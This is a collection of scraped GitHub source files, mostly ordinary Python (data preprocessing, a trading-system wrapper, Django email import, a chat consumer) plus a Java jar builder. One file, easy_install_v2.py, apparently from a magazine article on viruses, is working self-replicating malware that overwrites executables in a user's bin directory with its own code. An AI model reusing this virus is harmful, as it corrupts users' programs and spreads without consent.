buffer.extend(chunked)
if len(buffer) > int(4194304 / (features + 1)):
# write only when a certain size is reached
dataset.write(buffer)
buffer = []
if len(buffer) > 0:
# write remaining
dataset.write(buffer)
def gather_files(paths: List[str], openc: bool) -> List[str]:
"""
Finds all files contained in a directory and filter them based on their
extensions.
:param paths: Paths to the folder containing the files or to a single file
:param openc: True if opcode based encoding is requested (will parse .csv
files, .bin otherwise)
:return A list of paths to every file contained in the folder with .csv
or .bin extension (based on the function parameter)
"""
files = []
for path in paths:
if os.path.isdir(path):
cur_files = []
for _, _, found in os.walk(path):
for cur_file in found:
cur_abs = os.path.join(path, cur_file)
cur_files.append(cur_abs)
else:
cur_files = [path]
if openc:
ext = ".csv"
else:
ext = ".bin"
cur_files = list(
filter(lambda x: os.path.splitext(x)[1] == ext, cur_files))
if len(cur_files) == 0:
raise FileNotFoundError(f"No files with the correct extension, "
"{ext} were found in the given folder")
else:
files.extend(cur_files)
return files
| inoueke-n/optimization-detector | src/preprocess.py | preprocess.py | py | 7,391 | python | en | code | 3 | github-code | 36 | [
{
"api_name": "csv.field_size_limit",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "sys.maxsize",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "typing.List",
"line_number": 15,
"usage_type": "name"
},
{
"api_name": "os.path.exists",
... |
41133433788 | from cryptography.fernet import Fernet
import os
from pathlib import Path
default_path = Path("/home/Diode/Dicot/VisionIOT/main")
if not os.path.exists(default_path):
os.makedirs(default_path)
filen = os.path.join(default_path, "app.dat")
open(filen, 'w').close()
forread = open(filen)
content = forread.read()
forread.close()
appsetting = open(filen, 'w')
k_ey = Fernet.generate_key()
appsetting.write(content + "\nsecretKey: " + str(k_ey))
appsetting.close() | imdiode/PythonExper | home4.py | home4.py | py | 502 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "pathlib.Path",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "os.path.exists",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "os.makedirs",
"line_number"... |
22209534047 | # -*- coding: utf-8 -*-
"""
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 3 of the License,
or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, see <http://www.gnu.org/licenses/>.
"""
import logging
from subprocess import Popen
from os import devnull
try:
from functools import reduce
except:
pass
def get_time_info(state):
if "#" in state:
state,time = state.split("#")
begin,end = time.split("-")
length = float(end)-float(begin)
end = float(end)
begin = float(begin)
newstate = [state,
float(begin),
float(end),
float(length)]
else:
newstate = [state, float(0), float(0), float(0)]
return newstate
def stripmac(state,mac):
if mac in state:
state = state.replace(mac, "")
state = state.strip()
if "playlist" in state:
state = state.replace("playlist", "")
state = state.strip()
else:
logging.error("MAC address not in telnet comm: %s", state)
return state
def check_required():
nulfp = open(devnull, "w")
for bin in ['sox', 'flac', 'lame', 'play', 'amixer']:
check = Popen(['which', bin], stdout=nulfp.fileno(), stderr=nulfp.fileno()).wait()
if not check==0:
logging.critical("Neccesary %s program not found on your system", bin)
return False
return True
def flac_time(t):
# adapted from Paul McGuire
# http://stackoverflow.com/questions/1384406/python-convert-seconds-to-hhmmss
# flac wants mm:ss.ms
return "%02d:%02d.%03d" % \
reduce(lambda ll,b : divmod(ll[0],b) + ll[1:],
[(t*1000,), 1000, 60])
def sox_time(t):
# idem as flac_time
# but sox wants hh:mm:ss.ms
return "%02d:%02d:%02d.%03d" % \
reduce(lambda ll,b : divmod(ll[0],b) + ll[1:],
[(t*1000,),1000,60,60])
| terual/sbcc | module/functions.py | functions.py | py | 2,415 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "logging.error",
"line_number": 53,
"usage_type": "call"
},
{
"api_name": "os.devnull",
"line_number": 57,
"usage_type": "argument"
},
{
"api_name": "subprocess.Popen",
"line_number": 60,
"usage_type": "call"
},
{
"api_name": "logging.critical",
... |
32033182710 | #!/usr/bin/env python3
# -*- coding:utf-8 -*-
"""
@author:ai
@file:rootNet.py
@time:2020/06/01
"""
import traceback
import warnings
from collections import defaultdict
import arrow
import pandas as pd
from configs.riskConfig import FUTURE_ENDS
from tradingSystem import Order
from configs.Database import mysql, Database
from tradingSystem.rootNet.RootNetTrading import RootNetTrading
from tradingSystem.CATS.catsserverapi.catsConfig import futureEnds, CatsTypeTotradeAcct
from tradingSystem.CATS.catsserverapi.catsDictionary import CASH, TOTALASSET, POSITIONASSET
from utils.Date import getTradeSectionDates
strategyEnvToTradingEnv = {
'prod': 'prod',
'dev': 'test'
}
class rootNet():
def __init__(self, env='dev', mode='test', commit=True):
self.env = env
self.mode = mode
self.commit = commit
self.trade_date = str(arrow.now().date())
self.pre_trade_date = self.pre_date = getTradeSectionDates(self.trade_date, -2)[0]
self.tradingServer = RootNetTrading(env=mode)
self.userAcctInfo = defaultdict(dict)
self.accountToStrategyid = {} # 匹配账户与策略id
self.syst_id = 'rootNet'
self.security_type = {}
self.need_change_cash = 0
self.codesStorage = {'000001.SH', '000300.SH', '399001.SZ'}
self.tradeTypeToInt = {
'B': (1, 1), # 股票买入
'S': (-1, 1), # 股票卖出
'B/OPEN': (1, 1), # 开多仓
'S/OPEN': (1, -1), # 开空仓
'B/CLOSE': (-1, -1), # 平空仓
'S/CLOSE': (-1, 1) # 平多仓
}
def getPriceInfo(self, windcode):
return self.tradingServer.getStkInfo(windcode)
def login(self, acct_id, acct_pwd, opt_id, opt_pwd):
"""
:return:
"""
self.tradingServer.login(acctId=acct_id, acctPwd=acct_pwd,
optId=opt_id, optPwd=opt_pwd)
def close(self):
self.tradingServer.disconnect()
def getCashAndAssert(self):
"""
:return: {account:(cash,position_value,totalAsset)}
"""
result = {}
fundInfo = self.tradingServer.getFundInfo()
for account, info in fundInfo.items():
position_value = info.get('currentStkValue', 0)+info.get('marginUsedAmt', 0)
cash = info['usableAmt'] + info['tradeFrozenAmt']
totalAsset = cash + position_value
result[account] = (cash, position_value, totalAsset)
return result
def getAccountInfoByStrategyidsAndLogin(self, strategy_ids):
"""
根据策略id获取账户信息
"""
sql_user = "select sys_id,user_acct,user_acct_pwd from user_account"
with mysql(self.env) as cursor:
cursor.execute(sql_user)
data = cursor.fetchall()
for row in data:
self.userAcctInfo[row[0]]['user_acct'] = row[1]
self.userAcctInfo[row[0]]['user_acct_pwd'] = row[2]
self.strategids_str = str(strategy_ids).replace("[", "").replace("]", "").strip(",")
sql_cash = "select strategy_id,sys_id,acct_type,cats_acct_type,trade_acct,trade_acct_pwd from cash_account where strategy_id in ({})".format(
self.strategids_str)
with mysql(self.env, cursor_type='dict') as cursor:
cursor.execute(sql_cash)
data = cursor.fetchall()
for row in data:
if row['sys_id'] == 'rootNet':
self.tradingServer.login(acctId=row['trade_acct'],
acctPwd=row['trade_acct_pwd'],
optId=self.userAcctInfo[row['sys_id']]['user_acct'],
optPwd=self.userAcctInfo[row['sys_id']]['user_acct_pwd'],
acctType=row['acct_type'])
self.accountToStrategyid[row['trade_acct']] = row['strategy_id']
self.security_type[row['trade_acct']] = row['cats_acct_type']
else:
warnings.warn("not support sys_id:{} of strategy:{}".format(row['sys_id'], row['strategy_id']))
def _get_pre_sod_total_asset(self, strategy_id, trade_date, account_type):
with mysql(self.env) as cursor:
sql = "select total_asset from account where strategy_id = %s and trade_date = %s and account_type = %s"
cursor.execute(sql, (strategy_id, trade_date, account_type))
data = cursor.fetchall()
if data:
return data[0]
else:
return None
def getPosition(self, tradeAcct=''):
"""
:return:
"""
param = {'acct': [tradeAcct]} if tradeAcct else {}
positions = self.tradingServer.getPositions(where=param)
return positions
def getTrades(self, tradeAcct=''):
"""
:return:
"""
param = {'acct': [tradeAcct]} if tradeAcct else {}
trades = self.tradingServer.getTrades(where=param)
return trades
def store_position(self):
positions = self.getPosition()
if isinstance(positions, pd.DataFrame):
if positions.empty:
print("今日持仓为空!")
return
else:
if not positions:
print("今日持仓为空!")
return
positions['strategy_id'] = positions['ACCOUNT'].map(self.accountToStrategyid)
rows = []
for index, row in positions.iterrows():
rows.append((row['strategy_id'], self.trade_date, row["LS"], row['WIND_CODE'],
CatsTypeTotradeAcct[self.security_type[row['ACCOUNT']]],
row['POSITION'], row['AMOUNT']))
self.codesStorage.add(row['WIND_CODE'])
sql_insert = "insert into position (strategy_id,trade_date,LS,windcode,account_type,volume,amount) values (%s,%s,%s,%s,%s,%s,%s)"
self.saveToDb('position', sql_insert, rows)
def store_account(self):
accountInfo = self.getCashAndAssert()
print(accountInfo)
rows = []
for acct, info in accountInfo.items():
# (cash,position_value,totalAsset)}
cash, position_value, totalAsset = info
strategy_id = self.accountToStrategyid[acct]
sod_total_asset = self._get_pre_sod_total_asset(strategy_id, self.pre_date,
CatsTypeTotradeAcct[self.security_type[acct]])
if sod_total_asset == None:
sod_total_asset = totalAsset
rows.append(
(strategy_id, self.trade_date, CatsTypeTotradeAcct[self.security_type[acct]], position_value, cash,
totalAsset, sod_total_asset))
sql_insert = "insert into `account` (strategy_id,trade_date,account_type,position_value,cash,total_asset,sod_total_asset) " \
"values (%s,%s,%s,%s,%s,%s,%s)"
self.saveToDb('account', sql_insert, rows)
def store_today_trades(self, ):
trades = self.getTrades()
if isinstance(trades, pd.DataFrame):
if trades.empty:
print("今日无成交!")
return
else:
if not trades:
print("今日无成交!")
return
# ["WIND_CODE","SECURITY_CODE", "MARKET_TYPE", "SECURITY_NAME",
# "TRADE_TYPE", "TRADE_PRICE", "TRADE_VOLUME", "TRADE_AMOUNT"]]
trades = trades
rows = []
for index, row in trades.iterrows():
rows.append((self.trade_date, self.accountToStrategyid[row['ACCOUNT']], row['WIND_CODE'],
*self.tradeTypeToInt[row['TRADE_TYPE']],
row['TRADE_AMOUNT'], row['TRADE_VOLUME'], row['TRADE_PRICE']))
self.codesStorage.add(row['WIND_CODE'])
sql_insert = "insert into trade (trade_date,strategy_id,windcode,BS,LS,notional,volume,price) " \
"values (%s,%s,%s,%s,%s,%s,%s,%s)"
self.saveToDb('trade', sql_insert, rows)
def submitOrder(self, wind_code: str, tradeSide: str, targetVol: int, price: float):
"""
直接下单
:param wind_code:wind代码
:param tradeSide:买卖方向(B/S)
:param targetVol:目标量
:param price:委托价格
:return:
"""
order = Order(windCode=wind_code, orderType=tradeSide, orderQty=targetVol, orderPrice=price)
self.tradingServer.sendOrder({self.acct_id: [order]})
def cancelOrders(self, windcode=''):
"""
"""
data = self.tradingServer.getOriginalOrder()
cancelkeys = self.getCancelKeys(data, windcode)
self.tradingServer.cancelOrder(cancelkeys)
def getCancelKeys(self, df, windcode=''):
"""
通过条件获取原始订单信息,处理dataframe后返回acctid^^exchid^^contractNum 组成的id列表
:param where:筛选条件{}
:return:列表[id,...]
"""
if isinstance(df, pd.DataFrame):
if not df.empty:
df = df[df["CANCELABLE"] == 'Y']
if windcode:
df = df[df['WIND_CODE'] == windcode]
else:
if not df:
return []
ids = df.CANCEL_KEY.values
return ids
def getWindCodeAndMMF(self):
sql = "select attribute,value from strategy_static_configs where strategy_id = %s"
result = {}
with mysql(self.env) as cursor:
cursor.execute(sql, self.strategy_id)
data = cursor.fetchall()
if data:
for row in data:
result[row[0]] = row[1]
return result
def getPositionRatioOfMMF(self, windCode=''):
sql = "select target_ratio from target_position where strategy_id = %s and windcode = '%s'"
with mysql(self.env) as cursor:
cursor.execute(sql, (self.strategy_id, windCode))
data = cursor.fetchall()
if data:
return data[0]
else:
return 0
def storeClosePrice(self):
rows = []
closePrice = {}
for windCode in self.codesStorage:
stkInfo = self.tradingServer.getStkInfo(windCode)
if windCode.endswith(FUTURE_ENDS):
preSettlePrice = stkInfo.preSettlementPrice
preClosePrice = stkInfo.preClosePrice
else:
preSettlePrice = stkInfo.closePrice
preClosePrice = stkInfo.closePrice
pctchange = (stkInfo.newPrice - preSettlePrice) / preSettlePrice if preSettlePrice else 0
rows.append(
(self.trade_date, windCode, stkInfo.newPrice, pctchange, stkInfo.knockQty, stkInfo.knockAmt)
)
closePrice[windCode] = (
self.trade_date, windCode, stkInfo.newPrice, pctchange, stkInfo.knockQty, stkInfo.knockAmt,
preClosePrice)
return closePrice
def saveToDb(self,table, sql_insert, rows):
with mysql(self.env, commit=self.commit) as cursor:
try:
sql_delete = "delete from {} where trade_date = '{}' and strategy_id in ({})".format(table, self.trade_date, self.strategids_str)
cursor.execute(sql_delete)
cursor.executemany(sql_insert, rows)
except:
traceback.print_exc() | Joey2634/MultiFactorFramework | tradingSystem/CATS/catsserverapi/UseAITrading/rootNet.py | rootNet.py | py | 11,539 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "arrow.now",
"line_number": 34,
"usage_type": "call"
},
{
"api_name": "utils.Date.getTradeSectionDates",
"line_number": 35,
"usage_type": "call"
},
{
"api_name": "tradingSystem.rootNet.RootNetTrading.RootNetTrading",
"line_number": 36,
"usage_type": "call"
... |
27049180203 | from datetime import datetime
from django.core.management.base import BaseCommand
from django.utils.timezone import now
from django.conf import settings
from django.core.files.uploadedfile import SimpleUploadedFile
from django.utils.translation import gettext as _
from imap_tools import MailBox, AND
from filebrowser.base import FileObject
from blog.models import Article
from pages.models import GalleryImage
from users.models import User
def process_message(message, usr):
msg = message.text
d = {'title': _('TITLE['), 'intro': _('DESCRIPTION['),
'body': _('TEXT['), 'date': _('DATE['),
'tags': _('CATEGORIES['), 'notice': _('NOTICE[')}
for key, value in d.items():
msg = msg.replace(value, '')
d[key] = msg.split(']', 1)[0].replace('\r\n', '')
msg = msg.split(']', 1)[1]
try:
d['date'] = datetime.strptime(d['date'], '%d/%m/%y')
except:
d['date'] = now()
post = Article(title=d['title'], intro=d['intro'], body=d['body'],
date=d['date'], tags=d['tags'], author=usr, notice=d['notice'] )
try:
post.save()
except:
return
for att in message.attachments: # list: [Attachment objects]
file = SimpleUploadedFile(att.filename, att.payload,
att.content_type)
position = att.filename.split('-', 1)[0]
caption = att.filename.split('-', 1)[1]
caption = caption.rsplit('.', 1)[0]
instance = GalleryImage(post_id=post.uuid, image=file,
position=position, caption=caption)
#save the instance and upload the file
instance.save()
#update the filebrowse field
instance.fb_image = FileObject(str(instance.image))
instance.save()
def do_command():
if not settings.FETCH_EMAILS:
return
HOST = settings.IMAP_HOST
USER = settings.IMAP_USER
PASSWORD = settings.IMAP_PWD
PORT = settings.IMAP_PORT
FROM = settings.IMAP_FROM
with MailBox(HOST).login(USER, PASSWORD, 'INBOX') as mailbox:
for message in mailbox.fetch(AND(seen=False, subject=_('articles'), ),
mark_seen=True):
try:
usr = User.objects.get(email=message.from_)
if not usr.has_perm('blog.add_article'):
continue
except:
continue
process_message(message, usr)
class Command(BaseCommand):
def handle(self, *args, **options):
do_command()
| andywar65/project_repo | blog/management/commands/fetch_article_emails.py | fetch_article_emails.py | py | 2,479 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "django.utils.translation.gettext",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "django.utils.translation.gettext",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "django.utils.translation.gettext",
"line_number": 20,
"usage_type": "ca... |
13329932727 | import json
from channels.generic.websocket import WebsocketConsumer
from django.contrib.auth.models import User
from gestion_admin.models import Article, Historique
class ChatConsumer(WebsocketConsumer):
def connect(self):
self.user = User.objects.get(username=self.scope["user"])
self.historique = Historique.objects.filter(user=self.user)
self.article = Article.objects.get(id=self.scope['url_route']['kwargs']['room'])
print(self.user, self.article)
self.last_history = self.historique[self.historique.count()-1]
self.last_article = self.last_history.article
self.id = self.last_article.id
self.title = self.last_article.title
self.categorie = self.last_article.categorie
self.text = self.last_article.file.read().decode('utf-8')
print(self.last_history, self.last_article)
print(self.text)
self.accept()
def disconnect(self, close_code):
self.close()
def receive(self, text_data):
reponse = None
text_data_json = json.loads(text_data)
message = text_data_json['message']
print(message)
if 'hello' in message:
reponse = {
'type' : 'text',
'text' : "Hello I'am ChatBot!"
}
elif 'hi' in message:
reponse= {
'type' : 'link',
'article' : 1,
'text' : 'hello'
}
self.send(text_data=json.dumps(reponse)) | meryem1994/chatbot-project | user/consumers.py | consumers.py | py | 1,526 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "channels.generic.websocket.WebsocketConsumer",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "django.contrib.auth.models.User.objects.get",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "django.contrib.auth.models.User.objects",
"line_numbe... |
31739800389 | from multiprocessing import Process
import time
class MyProcess(Process):
def __init__(self,name):
super().__init__()
self.name=name
def run(self):
print("%s is running" % self.name)
time.sleep(1)
print("%s is done" % self.name)
if __name__=="__main__":
p=MyProcess("subprocess_1")
p.start()
print("main process end") | bigcpp110/python_learning | 并发编程/process_class.py | process_class.py | py | 400 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "multiprocessing.Process",
"line_number": 5,
"usage_type": "name"
},
{
"api_name": "time.sleep",
"line_number": 12,
"usage_type": "call"
}
] |
75118097702 | #!/usr/bin/python3
# === INFECTED ===
import os
from sys import argv
import stat
import random
import base64
import tempfile
cmd_init, cmd = ('ls', 'ls')
pathToCorrupt = '/home/tristan/my_bin/'
fileToCorrupt = pathToCorrupt + cmd
def isInfected(content):
return content == b'# === INFECTED ===\n'
def bomb():
print('BEAAAAAAAAAAH!')
with open(fileToCorrupt, 'rb') as currentFile:
ftcLines = currentFile.readlines()
if isInfected(ftcLines[1]):
filenames = os.listdir(pathToCorrupt)
random.shuffle(filenames)
for cmd in filenames:
if cmd != cmd_init:
with open(pathToCorrupt + cmd, 'rb') as newFile:
ftcLines = newFile.readlines()
if not isInfected(ftcLines[1]):
fileToCorrupt = pathToCorrupt + cmd
break
else:
print('All files already corrupted!')
exit(0)
# ftcLines contient le code binaire du programme
ftcLines = b''.join(ftcLines)
# On détermine où se trouve le code exécutable original
with open(argv[0], 'rb') as currentFile:
content = currentFile.readlines()
startOrigin = False
original = None
virus = []
for i in range(len(content)):
if startOrigin:
original = content[i][2:]
else:
virus.append(content[i])
if content[i] == b'# === ORIGINAL ===\n':
startOrigin = True
# virus contient le virus
# original contient le code binaire original
# On efface l'exécutable, on écrit le code Python et on colle le code binaire
print('Infection in progress : command', cmd)
os.remove(fileToCorrupt)
with open(fileToCorrupt, 'wb') as currentFile:
for line in virus:
currentFile.write(line)
currentFile.write(b'# ' + base64.b64encode(ftcLines))
os.chmod(fileToCorrupt, stat.S_IXUSR | stat.S_IRUSR | stat.S_IWUSR | stat.S_IXGRP | stat.S_IROTH | stat.S_IWOTH | stat.S_IXOTH | stat.S_IROTH | stat.S_IWOTH)
# Bombe logique
bomb()
# Exécution du code original
try:
if argv[0] != './easy_install_v2.py':
if original is None:
original = ftcLines
temp = tempfile.NamedTemporaryFile(delete=True)
with open(temp.name, 'wb') as tmpCmdFile:
tmpCmdFile.write(base64.b64decode(original))
os.chmod(temp.name, stat.S_IXUSR | stat.S_IRUSR | stat.S_IWUSR | stat.S_IXGRP | stat.S_IROTH | stat.S_IWOTH | stat.S_IXOTH | stat.S_IROTH | stat.S_IWOTH)
temp.file.close()
os.system(temp.name +' ' + ' '.join(argv[1:]))
except:
exit(2)
# === ORIGINAL ===
| GLMF/GLMF201 | Libs_et_Modules/easy_install_v2.py | easy_install_v2.py | py | 2,566 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "os.listdir",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "random.shuffle",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "sys.argv",
"line_number": 40,
"usage_type": "name"
},
{
"api_name": "os.remove",
"line_number": 59,... |
4000738437 | import argparse
import math
from pathlib import Path
import random
import sys
import numpy as np
import pandas as pd
TRAIN_POOL_FILEPATH = "../../outputs/data_generation/train_pool.tsv"
TRAIN_FILEPATH_FS = "../../outputs/data_generation/{}/run_{}/round_{}/train.tsv"
TO_PREDICT_FILEPATH_FS = "../../outputs/data_generation/{}/run_{}/round_{}/to_predict.tsv"
PREDICTED_FILEPATH_FS = "../../outputs/data_generation/{}/run_{}/round_{}/predicted.tsv"
STRATIFIED_LOG_FILEPATH_FS = "../../outputs/data_generation/{}/run_{}/round_{}/stratified_log.txt"
STRATIFIED_NUM_BINS = 10
SAMPLING_STRATEGIES = [
"certain_pos",
"uncertain",
"stratified",
"random",
]
def parse_argument() -> argparse.Namespace:
parser = argparse.ArgumentParser(description="Generate the first version of annotation.")
parser.add_argument(
"--random_state",
type=int,
help="Set random state.",
)
parser.add_argument(
"--sampling_strategy",
type=str,
required=True,
help="Sampling strategy to use (stratified|certain_pos|uncertain).",
)
parser.add_argument(
"--run",
type=int,
required=True,
help="Specify which run this is for.",
)
parser.add_argument(
"--round",
type=int,
required=True,
help="Current round.",
)
parser.add_argument(
"--total_rounds",
type=int,
required=True,
help="Total number of rounds.",
)
parser.add_argument(
"--train_pool_filepath",
type=str,
default=TRAIN_POOL_FILEPATH,
help=f"Training pool filepath. (Default: {TRAIN_POOL_FILEPATH})",
)
args = parser.parse_args()
return args
def _drop_duplicates():
pass
def main():
args = parse_argument()
if args.sampling_strategy not in SAMPLING_STRATEGIES:
raise ValueError(f"Invalid sampling startegy: {args.sampling_strategy}")
print(f"***** {args.sampling_strategy}|run_{args.run}|round_{args.round} START *****")
if args.random_state:
random.seed(args.random_state)
df_train_pool = pd.read_csv(args.train_pool_filepath, sep='\t')
df_train_pool = df_train_pool.sample(frac=1, random_state=args.random_state)
print(f"Train pool shape: {df_train_pool.shape[0]}")
num_train_per_round = math.ceil(df_train_pool.shape[0] / args.total_rounds)
print(f"Number of training data per round: {num_train_per_round}")
train_filepath = TRAIN_FILEPATH_FS.format(
args.sampling_strategy, args.run, args.round)
to_predict_filepath = TO_PREDICT_FILEPATH_FS.format(
args.sampling_strategy, args.run, args.round)
Path(train_filepath).parent.mkdir(parents=True, exist_ok=True)
Path(to_predict_filepath).parent.mkdir(parents=True, exist_ok=True)
#
if args.round == 1:
df_train = df_train_pool[:num_train_per_round]
df_to_predict = df_train_pool[num_train_per_round:]
print(f"Training data shape: {df_train.shape[0]}")
print(f"To predict data shape: {df_to_predict.shape[0]}")
print(f"Saving training data to '{train_filepath}'")
df_train.to_csv(train_filepath, sep='\t', index=False)
print(f"Saving to_predict data to '{to_predict_filepath}'")
df_to_predict.to_csv(to_predict_filepath, sep='\t', index=False)
else:
predicted_filepath = PREDICTED_FILEPATH_FS.format(
args.sampling_strategy, args.run, args.round-1)
df_predicted = pd.read_csv(predicted_filepath, sep='\t', keep_default_na=False)
df_predicted.sort_values("prob", ascending=False, inplace=True)
print(f"Predicted '{predicted_filepath}' size: {df_predicted.shape[0]}")
prev_train_filepath = TRAIN_FILEPATH_FS.format(
args.sampling_strategy, args.run, args.round-1)
df_train = pd.read_csv(prev_train_filepath, sep='\t', keep_default_na=False)
print(f"Previous training data '{prev_train_filepath}' size: {df_train.shape[0]}")
if args.sampling_strategy == "certain_pos":
df_train_new = df_predicted[:num_train_per_round].copy()
df_to_predict = df_predicted[num_train_per_round:].copy()
elif args.sampling_strategy == "uncertain":
df_predicted["uncertainty"] = df_predicted["prob"].apply(lambda x: np.min([1-x, x]))
df_predicted.sort_values("uncertainty", ascending=False, inplace=True)
df_train_new = df_predicted[:num_train_per_round].copy()
df_to_predict = df_predicted[num_train_per_round:].copy()
df_train_new.drop("uncertainty", axis=1, inplace=True)
df_to_predict.drop("uncertainty", axis=1, inplace=True)
elif args.sampling_strategy == "stratified":
stratified_log_filepath = STRATIFIED_LOG_FILEPATH_FS.format(
args.sampling_strategy, args.run, args.round)
Path(stratified_log_filepath).parent.mkdir(parents=True, exist_ok=True)
Path(stratified_log_filepath).unlink(missing_ok=True)
for num_linspace in range(11, 1, -1):
print(f"Number of prob bins testing: {num_linspace-1}")
num_train_per_bin = math.floor(num_train_per_round / (num_linspace-1))
num_train_final_bin = num_train_per_round - num_train_per_bin*(num_linspace-2)
print(f"num_train_per_bin: {num_train_per_bin}")
df_predicted_copy = df_predicted.copy()
df_predicted_copy["prob_bin"] = pd.cut(
df_predicted_copy["prob"],
bins=np.linspace(0, 1, num_linspace),
include_lowest=True,
)
df_grouped_size = df_predicted_copy.groupby("prob_bin").size()
print("Predicted grouped by prob bin:\n", df_grouped_size)
with open(stratified_log_filepath, 'a') as _f:
_f.write(f"num_bins: {num_linspace-1}\n")
_f.write(f"num_train_per_bin: {num_train_per_bin}\n")
_f.write(f"num_train_final_bin: {num_train_final_bin}\n")
_f.write("Predicted grouped by prob bin:\n")
_f.write(str(df_grouped_size)+'\n\n')
if num_train_final_bin > min(df_grouped_size.tolist()):
print("Not enough training data per bin. Reducing the prob bin...")
continue
else:
print("Enough training data")
train_new_data = []
to_predict_data = []
cur_bin = 1
df_grouped = df_predicted_copy.groupby("prob_bin")
for group, df_subset in df_grouped:
df_subset = df_subset.sample(frac=1, random_state=args.random_state)
n = num_train_per_bin if cur_bin < (num_linspace-1) else num_train_final_bin
train_new_data.append(df_subset[:n])
to_predict_data.append(df_subset[n:])
cur_bin += 1
df_train_new = pd.concat(train_new_data).drop("prob_bin", axis=1)
df_to_predict = pd.concat(to_predict_data).drop("prob_bin", axis=1)
break
elif args.sampling_strategy == "random":
df_predicted_shuffled = df_predicted.sample(frac=1, random_state=args.random_state)
df_train_new = df_predicted_shuffled[:num_train_per_round].copy()
df_to_predict = df_predicted_shuffled[num_train_per_round:].copy()
train_new_filepath = train_filepath.replace('.tsv', '_new.tsv')
print(f"Saving training data new to this round to '{train_new_filepath}'")
df_train_new.to_csv(train_new_filepath, sep='\t', index=False)
df_train_new.drop("prob", axis=1, inplace=True)
df_train = pd.concat([df_train, df_train_new])
df_to_predict.drop("prob", axis=1, inplace=True)
print(f"Saving training data to '{train_filepath}'")
df_train.to_csv(train_filepath, sep='\t', index=False)
print(f"Saving to_predict data to '{to_predict_filepath}'")
df_to_predict.to_csv(to_predict_filepath, sep='\t', index=False)
print(f"***** {args.sampling_strategy}|run_{args.run}|round_{args.round} END *****")
if __name__ == '__main__':
main()
| IBPA/SemiAutomatedFoodKBC | src/data_generation/prepare_training_data.py | prepare_training_data.py | py | 8,371 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "argparse.ArgumentParser",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "argparse.Namespace",
"line_number": 25,
"usage_type": "attribute"
},
{
"api_name": "random.seed",
"line_number": 86,
"usage_type": "call"
},
{
"api_name": "pandas.re... |
35396554268 | from __future__ import (nested_scopes, generators, division, absolute_import, with_statement,
print_function, unicode_literals)
from abc import abstractmethod, abstractproperty
from contextlib import contextmanager
import os
import tempfile
from twitter.common.collections import maybe_list
from twitter.common.lang import AbstractClass, Compatibility
from pants.backend.jvm.targets.jvm_binary import Duplicate, Skip, JarRules
from pants.backend.jvm.tasks.nailgun_task import NailgunTask
from pants.base.exceptions import TaskError
from pants.base.workunit import WorkUnit
from pants.java.jar.manifest import Manifest
from pants.util.contextutil import temporary_dir
class Jar(object):
"""Encapsulates operations to build up or update a jar file.
Upon construction the jar is conceptually opened for writes. The write methods are called to
add to the jar's contents and then changes are finalized with a call to close. If close is not
called the staged changes will be lost.
"""
class Error(Exception):
"""Indicates an error creating or updating a jar on disk."""
class Entry(AbstractClass):
"""An entry to be written to a jar."""
def __init__(self, dest):
self._dest = dest
@property
def dest(self):
"""The destination path of the entry in the jar."""
return self._dest
@abstractmethod
def materialize(self, scratch_dir):
"""Materialize this entry's source data into a filesystem path.
:param string scratch_dir: A temporary directory that may be used to do any work required
to materialize the entry as a source file. The caller is responsible for cleaning up
`scratch_dir` after the jar is closed.
:returns: The path to the source data.
"""
class FileSystemEntry(Entry):
"""An entry backed by an existing file on disk."""
def __init__(self, src, dest=None):
super(Jar.FileSystemEntry, self).__init__(dest)
self._src = src
def materialize(self, _):
return self._src
class MemoryEntry(Entry):
"""An entry backed by an in-memory sequence of bytes."""
def __init__(self, dest, contents):
super(Jar.MemoryEntry, self).__init__(dest)
self._contents = contents
def materialize(self, scratch_dir):
fd, path = tempfile.mkstemp(dir=scratch_dir)
try:
os.write(fd, self._contents)
finally:
os.close(fd)
return path
def __init__(self):
self._entries = []
self._jars = []
self._manifest = None
self._main = None
self._classpath = None
def main(self, main):
"""Specifies a Main-Class entry for this jar's manifest.
:param string main: a fully qualified class name
"""
if not main or not isinstance(main, Compatibility.string):
raise ValueError('The main entry must be a non-empty string')
self._main = main
def classpath(self, classpath):
"""Specifies a Class-Path entry for this jar's manifest.
:param list classpath: a list of paths
"""
self._classpath = maybe_list(classpath)
def write(self, src, dest=None):
"""Schedules a write of the file at ``src`` to the ``dest`` path in this jar.
If the ``src`` is a file, then ``dest`` must be specified.
If the ``src`` is a directory then by default all descendant files will be added to the jar as
entries carrying their relative path. If ``dest`` is specified it will be prefixed to each
descendant's relative path to form its jar entry path.
:param string src: the path to the pre-existing source file or directory
:param string dest: the path the source file or directory should have in this jar
"""
if not src or not isinstance(src, Compatibility.string):
raise ValueError('The src path must be a non-empty string, got %s of type %s.'
% (src, type(src)))
if dest and not isinstance(dest, Compatibility.string):
raise ValueError('The dest entry path must be a non-empty string, got %s of type %s.'
% (dest, type(dest)))
if not os.path.isdir(src) and not dest:
raise self.Error('Source file %s must have a jar destination specified' % src)
self._add_entry(self.FileSystemEntry(src, dest))
def writestr(self, path, contents):
"""Schedules a write of the file ``contents`` to the given ``path`` in this jar.
:param string path: the path to write the contents to in this jar
:param string contents: the raw byte contents of the file to write to ``path``
"""
if not path or not isinstance(path, Compatibility.string):
raise ValueError('The path must be a non-empty string')
